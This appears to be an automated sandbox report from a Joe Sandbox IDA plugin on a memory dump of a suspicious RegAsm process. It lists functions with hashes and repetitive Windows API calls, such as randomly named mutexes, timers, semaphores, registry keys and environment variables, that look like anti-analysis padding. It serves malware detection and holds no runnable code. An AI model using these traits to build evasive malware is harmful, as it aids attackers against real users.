Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: 9be700ef6adce53558aa64b3ac194dc0a1ace136a06b0c87b03e790b3c2d249e
Instruction ID: 52cc22178a8c6914cf4de74923a509fc4cd343a0353413116b11185622f450b5
Opcode Fuzzy Hash: 9be700ef6adce53558aa64b3ac194dc0a1ace136a06b0c87b03e790b3c2d249e
Instruction Fuzzy Hash: E0816071A00609EBDB14DFA4DC89EEE7B75FB88310F108129FA15A7290D778A911CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BE6 Relevance: 21.2, APIs: 14, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F118
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F150
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,771B2F20), ref: 0040F165
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F16C
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,771B2F20), ref: 0040F177
Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,771B2F20), ref: 0040F185
Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F18C
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,771B2F20), ref: 0040F1AA
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1B7
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,771B2F20), ref: 0040F1C7
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1E0
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,771B2F20), ref: 0040F1E7
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,771B2F20), ref: 0040F1F0
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F1FB
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,771B2F20), ref: 0040F223
Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C

GetFileSize.KERNEL32(00000000,00000000), ref: 00403CDE

Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,771B2F20), ref: 0040F217

LocalFree.KERNEL32(00000000), ref: 00403E0B
LocalFree.KERNEL32(?), ref: 00403E14
LocalFree.KERNEL32(?), ref: 00403E1B
LocalFree.KERNEL32(00000000), ref: 00403E22
FindClose.KERNEL32(00000002), ref: 00403E49
LocalFree.KERNEL32(00000002), ref: 00403E52
LocalFree.KERNEL32(?), ref: 00403E62
LocalFree.KERNEL32(00000000), ref: 00403E69
LocalFree.KERNEL32(?), ref: 00403E70
LocalFree.KERNEL32(00000000), ref: 00403E77
LocalFree.KERNEL32(?), ref: 00403E80
LocalFree.KERNEL32(?), ref: 00403E89
LocalFree.KERNEL32(00000000), ref: 00403E90

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$CreateFree$TimerWaitable$DebugOutputString$ErrorEventLastMutexReleaseSemaphore$CloseEnvironmentFileFindVariable$Cancel$AllocMappingOpen$ChangeNotificationResetlstrlen$FirstGlobalHandleSize
String ID:
API String ID: 1255070540-0
Opcode ID: 89bb61e5f871ff12f16140be32d818f1eaa4787c323720a94d4e10b0df48461d
Instruction ID: 860ca1dcaf975a5fa852e23f8dedbfa3d7c550796d3681c6397e56688bcd00f3
Opcode Fuzzy Hash: 89bb61e5f871ff12f16140be32d818f1eaa4787c323720a94d4e10b0df48461d
Instruction Fuzzy Hash: 5D716C71A00605EBDB14DFA0DC48EEE7BB9FBC9700F108179F515A7291DB789E019BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040392D Relevance: 21.2, APIs: 14, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F118
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F150
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,771B2F20), ref: 0040F165
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F16C
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,771B2F20), ref: 0040F177
Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,771B2F20), ref: 0040F185
Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F18C
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,771B2F20), ref: 0040F1AA
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1B7
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,771B2F20), ref: 0040F1C7
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1E0
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,771B2F20), ref: 0040F1E7
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,771B2F20), ref: 0040F1F0
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F1FB
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,771B2F20), ref: 0040F223
Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C

GetFileSize.KERNEL32(00000000,00000000), ref: 00403A25

Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,771B2F20), ref: 0040F217

LocalFree.KERNEL32(00000000), ref: 00403B52
LocalFree.KERNEL32(?), ref: 00403B5B
LocalFree.KERNEL32(?), ref: 00403B62
LocalFree.KERNEL32(00000000), ref: 00403B69
FindClose.KERNEL32(00000002), ref: 00403B90
LocalFree.KERNEL32(00000002), ref: 00403B99
LocalFree.KERNEL32(?), ref: 00403BA9
LocalFree.KERNEL32(00000000), ref: 00403BB0
LocalFree.KERNEL32(?), ref: 00403BB7
LocalFree.KERNEL32(00000000), ref: 00403BBE
LocalFree.KERNEL32(?), ref: 00403BC7
LocalFree.KERNEL32(?), ref: 00403BD0
LocalFree.KERNEL32(00000000), ref: 00403BD7

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$CreateFree$TimerWaitable$DebugOutputString$ErrorEventLastMutexReleaseSemaphore$CloseEnvironmentFileFindVariable$Cancel$AllocMappingOpen$ChangeNotificationResetlstrlen$FirstGlobalHandleSize
String ID:
API String ID: 1255070540-0
Opcode ID: 766290859f6d77a885f6fc0a636182ca5b15525b408557fd22563b058c76cb37
Instruction ID: 91d082d5e3e4d1df036fdba9a6df0387cb50e19caeaddd8ab95f8299dce3539a
Opcode Fuzzy Hash: 766290859f6d77a885f6fc0a636182ca5b15525b408557fd22563b058c76cb37
Instruction Fuzzy Hash: DC718B71A00605EBDB14DFA0DC48EEE7BB9FBC9304F108179F511A7291DB789E009B68

Uniqueness

Uniqueness Score: -1.00%

Function 004084FB Relevance: 21.2, APIs: 14, Instructions: 219COMMON

Download Yara Rule

APIs

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F118
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F150
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,771B2F20), ref: 0040F165
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F16C
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,771B2F20), ref: 0040F177
Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,771B2F20), ref: 0040F185
Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F18C
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,771B2F20), ref: 0040F1AA
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1B7
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,771B2F20), ref: 0040F1C7
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1E0
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,771B2F20), ref: 0040F1E7
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,771B2F20), ref: 0040F1F0
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F1FB
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,771B2F20), ref: 0040F223
Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C

GetFileSize.KERNEL32(00000000,00000000), ref: 004085F0

Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,771B2F20), ref: 0040F217

LocalFree.KERNEL32(00000000), ref: 00408716
LocalFree.KERNEL32(004081BE), ref: 0040871F
LocalFree.KERNEL32(004081BE), ref: 00408726
LocalFree.KERNEL32(00000000), ref: 0040872D
FindClose.KERNEL32(004096D2), ref: 00408754
LocalFree.KERNEL32(?), ref: 0040875D
LocalFree.KERNEL32(00000000), ref: 0040876D
LocalFree.KERNEL32(00000000), ref: 00408774
LocalFree.KERNEL32(004081BE), ref: 0040877B
LocalFree.KERNEL32(00000000), ref: 00408782
LocalFree.KERNEL32(004081BE), ref: 0040878B
LocalFree.KERNEL32(004081BE), ref: 00408794
LocalFree.KERNEL32(00000000), ref: 0040879B

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$CreateFree$TimerWaitable$DebugOutputString$ErrorEventLastMutexReleaseSemaphore$CloseEnvironmentFileFindVariable$Cancel$AllocMappingOpen$ChangeNotificationResetlstrlen$FirstGlobalHandleSize
String ID:
API String ID: 1255070540-0
Opcode ID: 9ae0fa37669b16dd948dd223cb2d2bb809a8aa26a414c92227cb55ff1efb209c
Instruction ID: 185cb91d7132478a3a6460e69a7a066de90890197c4a3ee621cf0f63ca6bc393
Opcode Fuzzy Hash: 9ae0fa37669b16dd948dd223cb2d2bb809a8aa26a414c92227cb55ff1efb209c
Instruction Fuzzy Hash: 8D716E71A00605EFDB149FB4DC88EEE7BB5FBC9300F108179F511A7291DB7899019BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409452 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
